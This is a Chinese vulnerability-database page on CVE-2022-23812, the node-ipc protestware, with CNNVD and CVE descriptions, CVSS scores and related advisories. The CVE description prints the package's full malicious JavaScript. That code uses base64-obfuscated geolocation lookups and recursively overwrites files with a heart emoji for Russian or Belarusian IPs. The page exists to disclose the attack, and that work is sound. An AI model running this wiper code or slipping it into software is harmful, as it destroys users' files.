目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2022-23812— node-ipc 安全漏洞

一分钟漏洞结论

影响对象
n/a node-ipc
利用判断
存在公开或 AI PoC,应优先验证
建议动作
优先检查厂商安全公告和参考链接中的修复版本;无法立即升级时,限制受影响服务暴露并加强监测。

node-ipc是美国Brandon Nozaki Miller个人开发者的一个 node.js 模块。用于本地和远程进程间通信,完全支持 Linux、Mac 和 Windows。 node-ipc 10.1.1版本至10.1.3之前版本 存在安全漏洞,该漏洞源于node-ipc包含恶意代码,针对 IP 位于俄罗斯或白俄罗斯的用户,并用特殊表情符号覆盖他们的文件。从node-ipc 11.0.0版本开始会导入peacenotwar包,而不是直接在node-ipc的源代码中包含恶意代码。

CVSS 9.8 · Critical EPSS 4.26% · P91
获取后续新漏洞提醒 登录后订阅

一、 漏洞 CVE-2022-23812 基础信息

漏洞信息

对漏洞内容有疑问?看看神龙的深度分析是否有帮助!
查看神龙十问 ↗

尽管我们使用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。神龙努力确保数据的准确性,但请您根据实际情况进行核实和判断。

Vulnerability Title
Malicious Package
来源: CVE Program / CVE List V5
Vulnerability Description
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
来源: CVE Program / CVE List V5
CVSS Information
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
来源: CVE Program / CVE List V5
Vulnerability Type
N/A
来源: CVE Program / CVE List V5
Vulnerability Title
node-ipc 安全漏洞
来源: 中国国家信息安全漏洞库 CNNVD
Vulnerability Description
node-ipc是美国Brandon Nozaki Miller个人开发者的一个 node.js 模块。用于本地和远程进程间通信,完全支持 Linux、Mac 和 Windows。 node-ipc 10.1.1版本至10.1.3之前版本 存在安全漏洞,该漏洞源于node-ipc包含恶意代码,针对 IP 位于俄罗斯或白俄罗斯的用户,并用特殊表情符号覆盖他们的文件。从node-ipc 11.0.0版本开始会导入peacenotwar包,而不是直接在node-ipc的源代码中包含恶意代码。
来源: 中国国家信息安全漏洞库 CNNVD
CVSS Information
N/A
来源: 中国国家信息安全漏洞库 CNNVD
Vulnerability Type
N/A
来源: 中国国家信息安全漏洞库 CNNVD

受影响产品

厂商 产品 影响版本 CPE 订阅
- node-ipc 10.1.1 ~ unspecified -

二、漏洞 CVE-2022-23812 的公开POC

# POC 描述 源链接 神龙链接
1 node-ipc is malware / protestware! https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812 POC详情
AI 生成 POC 高级

未找到公开 POC。

登录以生成 AI POC

三、漏洞 CVE-2022-23812 的情报信息

请登录查看更多情报信息。

CVE-2022-23812 补丁与修复 (1)

CVE-2022-23812 厂商安全公告 (2)

CVE-2022-23812 其他参考 (3)

同批安全公告 · n/a · 2022-03-16 · 共 80 条

CVE-2021-23648 5.4 MEDIUM Braintree sanitize-url 跨站脚本漏洞
CVE-2022-21164 3.7 LOW node-lmdb 安全漏洞
CVE-2021-39694 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39692 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39707 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39689 Google Android 数据伪造问题漏洞
CVE-2021-39667 Google Android 缓冲区错误漏洞
CVE-2021-39624 Google Android 资源管理错误漏洞
CVE-2021-0957 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39793 Google Android 缓冲区错误漏洞
CVE-2021-39685 Google Android 缓冲区错误漏洞
CVE-2021-39693 Google Android 缓冲区错误漏洞
CVE-2021-39690 Google Android 输入验证错误漏洞
CVE-2021-39695 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39697 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39698 Google Android 资源管理错误漏洞
CVE-2021-39701 Google Android 输入验证错误漏洞
CVE-2021-39702 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39703 Google Android 权限许可和访问控制问题漏洞
CVE-2021-39704 Google Android 权限许可和访问控制问题漏洞

显示前 20 条,共 80 条。 查看全部 &rarr; →

IV. Related Vulnerabilities

V. Comments for CVE-2022-23812

暂无评论


发表评论